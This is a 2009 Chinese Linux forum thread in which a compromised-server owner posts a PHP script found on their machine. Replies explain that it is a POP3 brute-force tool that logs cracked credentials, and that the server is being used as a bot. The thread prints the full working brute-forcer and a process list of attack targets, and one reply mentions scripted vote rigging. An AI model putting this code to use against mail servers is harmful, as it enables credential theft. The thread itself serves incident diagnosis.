当前时区为 UTC + 8 小时



发表新帖 回复这个主题  [ 7 篇帖子 ] 
作者 内容
1 楼 
 文章标题 : 求助,这个进程看不懂
帖子发表于 : 2009-07-14 17:59 

注册: 2007-09-16 6:38
帖子: 11
送出感谢: 0 次
接收感谢: 0 次
前些天,发现服务器的密码被改了,查看history 发现确实有人改了我的密码,在/var/tmp/.log/下出现了好多莫名奇妙的文件,其中有 sesion.php
代码如下:
代码:
<?php
error_reporting(0);
function POPa($username, $password, $server) {
$socket = fsockopen($server, 110); // POP3 port
if (!$socket) {
return "cracked";

}

$res = fgets($socket, 512); // read +OK
if (substr(trim($res), 0, 3) != "+OK") {
return "cracked"; // return the error
}
fputs($socket, "USER $username\r\n"); // send user
$res = fgets($socket, 512); // read +OK
if (substr(trim($res), 0, 3) != "+OK") {
return "cracked";
}
fputs($socket, "PASS $password\r\n"); // send pass
$res = fgets($socket, 512); // read +OK
if (substr(trim($res), 0, 3) != "+OK") {
return $res;
}
fputs($socket, "QUIT\r\n"); // quit

fclose($socket);
$fp = fopen("vuln.txt", "a");
fwrite($fp, "$server,$username,$password");
fclose($fp);
return "cracked";
}

//SET INITIAL LOAD
$ip = $argv[1];


//READ USER/PASS FILE
$fp = fopen("pass_file", "r");
$i = 1;
$c2= 1;
while (!feof($fp)) {
$propozitie = fgets($fp, 4096);
$propozitie = explode(" ", $propozitie);
$user[$i] = $propozitie[0];
@$pass[$i] = $propozitie[1];
$i = $i + 1;
$c2 = $c2 + 1;
}
fclose($fp);

//Do BRUTE-FORCE ATACK
$x = 1;
$chestie = "not";

while (( $x < $c2 ) and ( $chestie != "cracked" )) {
$chestie = POPa($user[$x], $pass[$x], $ip);
if ( $chestie == "cracked" ) {
$quit = 1;
}
$x = $x + 1;
}

//SET END LOAD


?>
好像是一个测试pop3的代码,但是我就是不知道这个是怎么样运行的,我查看进程如下:
代码:
root      8135  0.0  0.2  23804 10060 pts/1    S    16:10   0:00 php sesion.php 81.181.202.66
root      8152  0.0  0.2  23804 10060 pts/1    S    16:10   0:00 php sesion.php 81.181.214.1
root      8226  0.0  0.2  23804 10060 pts/1    S    16:32   0:00 php sesion.php 81.114.235.170
root      8528  0.0  0.2  23804 10060 pts/1    S    17:04   0:00 php sesion.php 81.117.60.215
root      8540  0.0  0.2  23804 10060 pts/1    S    17:04   0:00 php sesion.php 81.117.82.114
root      8708  0.0  0.2  23804 10060 pts/1    S    17:37   0:00 php sesion.php 81.181.202.66
root      8716  0.0  0.2  23804 10064 pts/1    S    17:37   0:00 php sesion.php 81.181.202.72
root      8720  0.0  0.2  23804 10060 pts/1    S    17:37   0:00 php sesion.php 81.181.202.98
root      8724  0.0  0.2  23804 10064 pts/1    S    17:37   0:00 php sesion.php 81.181.202.99
root      8728  0.0  0.2  23804 10060 pts/1    S    17:37   0:00 php sesion.php 81.181.213.247
root      8736  0.0  0.2  23804 10060 pts/1    S    17:37   0:00 php sesion.php 81.181.214.1
root      8740  0.0  0.2  23804 10060 pts/1    S    17:37   0:00 php sesion.php 81.181.214.2
root      8752  0.0  0.2  23804 10060 pts/1    S    17:37   0:00 php sesion.php 81.181.249.125
root      8756  0.0  0.2  23804 10060 pts/1    S    17:37   0:00 php sesion.php 81.181.249.130
root      8772  0.0  0.2  23804 10060 pts/1    S    17:37   0:00 php sesion.php 81.181.253.101
root      8776  0.0  0.2  23804 10060 pts/1    S    17:37   0:00 php sesion.php 81.181.78.146
root      8788  0.0  0.2  23804 10060 pts/1    S    17:37   0:00 php sesion.php 81.181.94.76
root      9001  0.0  0.0   3008   784 pts/3    S+   17:52   0:00 grep php
root     21633  0.0  0.2  23804 10060 pts/1    S    07:26   0:00 php sesion.php 81.91.83.80
root     26412  0.0  0.2  23804 10060 pts/1    S    09:02   0:00 php sesion.php 81.91.85.133
root     26500  0.0  0.2  23804 10060 pts/1    S    09:02   0:00 php sesion.php 81.91.85.163
root     26544  0.0  0.2  23804 10060 pts/1    S    09:02   0:00 php sesion.php 81.91.85.179
root     26608  0.0  0.2  23804 10064 pts/1    S    09:02   0:00 php sesion.php 81.91.85.200
root     26616  0.0  0.2  23804 10056 pts/1    S    09:02   0:00 php sesion.php 81.91.85.203
root     26724  0.0  0.2  23804 10064 pts/1    S    09:02   0:00 php sesion.php 81.91.85.55
root     26752  0.0  0.2  23804 10060 pts/1    S    09:02   0:00 php sesion.php 81.91.85.66
root     26772  0.0  0.2  23804 10060 pts/1    S    09:02   0:00 php sesion.php 81.91.85.70
root     27580  0.0  0.2  23804 10060 pts/1    S    09:18   0:00 php sesion.php 81.91.85.84
root     28470  0.0  0.2  23804 10060 pts/1    S    09:40   0:00 php sesion.php 81.92.151.85

请问有人知道这个是怎么回事,自己是个菜鸟,希望得到大侠的帮助!


页首
 用户资料  
 
2 楼 
 文章标题 : Re: 求助,这个进程看不懂
帖子发表于 : 2009-07-14 20:28 
头像

注册: 2008-07-28 19:51
帖子: 805
地址: 长沙
送出感谢: 1
接收感谢: 2
你的服务器已经成为肉鸡,正在攻击其他的服务器


那个PHP代码很简单实用,大致解释如下:

POPa 是一个具体的行凶工具,通过输入用户、密码、对方服务器IP后,开始攻击其他的服务器。

输入文件: $fp = fopen("pass_file", "r");

这个文本通过 $propozitie = explode(" ", $propozitie); 之后,得到攻击的$user[$i]和$pass[$i]

攻击完成后,写入到本机文件$fp = fopen("vuln.txt", "a"); 得到攻击的结果。


页首
 用户资料  
 
3 楼 
 文章标题 : Re: 求助,这个进程看不懂
帖子发表于 : 2009-07-14 20:31 
头像

注册: 2008-07-28 19:51
帖子: 805
地址: 长沙
送出感谢: 1
接收感谢: 2
它的php是通过cli方式运行的,直接kill掉就行。

我以前帮人网络投票,也是类似这种做法 :em06

zhanggang@T60:~/ham$ php t1.php | grep "window.location"
<script> alert('谢谢您的投票!');window.location="http://www.xxxxxxxxxxx.com/votePage1.aspx?tid=3&cid=0" </script>


_________________
我的乌斑兔儿:http://zhanggang.net/m/b/b1/ubuntu右键选择在新的窗体打开
右边有一只黄手 ----> 或者注册Dropbox中文版感谢我


页首
 用户资料  
 
4 楼 
 文章标题 : Re: 求助,这个进程看不懂
帖子发表于 : 2009-07-15 10:32 

注册: 2007-09-16 6:38
帖子: 11
送出感谢: 0 次
接收感谢: 0 次
谢谢你给的指导,但是具体的我还是不很明白!!谢谢!能否给点学习资料!!!


页首
 用户资料  
 
5 楼 
 文章标题 : Re: 求助,这个进程看不懂
帖子发表于 : 2009-07-15 10:35 

注册: 2007-09-16 6:38
帖子: 11
送出感谢: 0 次
接收感谢: 0 次
谢谢你给的指导,但是具体的我还是不很明白!!谢谢!能否给点学习资料!!!


页首
 用户资料  
 
6 楼 
 文章标题 : Re: 求助,这个进程看不懂
帖子发表于 : 2009-07-15 19:35 
头像

注册: 2008-07-28 19:51
帖子: 805
地址: 长沙
送出感谢: 1
接收感谢: 2
在php.net上有大量的资料,比如上面用的fsockopen,在http://cn.php.net/manual/en/function.fsockopen.php里面就有详细的解释


_________________
我的乌斑兔儿:http://zhanggang.net/m/b/b1/ubuntu右键选择在新的窗体打开
右边有一只黄手 ----> 或者注册Dropbox中文版感谢我


页首
 用户资料  
 
7 楼 
 文章标题 : Re: 求助,这个进程看不懂
帖子发表于 : 2009-07-16 9:20 

注册: 2007-09-16 6:38
帖子: 11
送出感谢: 0 次
接收感谢: 0 次
谢谢您的指导


页首
 用户资料  
 
显示帖子 :  排序  
发表新帖 回复这个主题  [ 7 篇帖子 ] 

当前时区为 UTC + 8 小时


在线用户

正在浏览此版面的用户:没有注册用户 和 2 位游客


不能 在这个版面发表主题
不能 在这个版面回复主题
不能 在这个版面编辑帖子
不能 在这个版面删除帖子
不能 在这个版面提交附件

前往 :  
本站点为公益性站点,用于推广开源自由软件,由 DiaHosting VPSBudgetVM VPS 提供服务。
我们认为:软件应可免费取得,软件工具在各种语言环境下皆可使用,且不会有任何功能上的差异;
人们应有定制和修改软件的自由,且方式不受限制,只要他们自认为合适。

Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group
简体中文语系由 王笑宇 翻译